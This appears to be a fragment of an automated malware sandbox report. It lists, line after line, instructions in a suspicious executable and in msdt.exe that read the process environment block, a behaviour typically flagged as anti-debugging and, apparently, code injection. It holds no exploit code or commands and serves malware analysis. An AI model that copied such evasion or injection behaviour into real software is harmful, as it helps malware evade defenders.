          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FCFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AF8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AE3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AC5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AD766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B54257 mov eax, dword ptr fs:[00000030h]
